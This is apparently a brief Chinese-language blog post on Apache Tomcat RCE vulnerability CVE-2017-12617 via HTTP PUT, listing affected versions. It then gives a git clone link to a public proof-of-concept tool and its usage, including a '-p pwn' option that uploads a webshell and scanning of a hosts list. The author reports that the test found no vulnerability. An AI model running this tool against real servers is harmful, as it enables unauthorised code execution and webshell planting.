Apache Tomcat漏洞 之 CVE-2017-12617，

Apache Tomcat漏洞 之 CVE-2017-12617，

Apache Tomcat中发现的CVE-2017-12617严重远程代码执行（RCE）漏洞

影响启用了HTTP PUT的系统（通过将默认servlet的“只读”初始化参数设置为“false”）受到影响。如果默认servlet的参数只读设置为false，或者配置了默认servlet，则在9.0.1（Beta），8.5.23，8.0.47和7.0.82之前的Tomcat版本在所有操作系统上包含潜在危险的远程代码执行（RCE） WebDAV servlet的参数readonly被设置为false

POC:
git clone https://github.com/cyberheartmi9/CVE-2017-12617.git
用法：
选项：

-u， - url [::]检查目标网址是否易受攻击
-p， - pwn [::]生成webshel​​l并上传
–l，–list [::] hosts list

[+]用法：

./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py –url http://127.0.0.1
./cve-2017-12617.py -u http： //127.0.0.1 -p pwn
./cve-2017-12617.py –url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017- 12617.py –list hosts.txt

如题测试 没有改漏洞。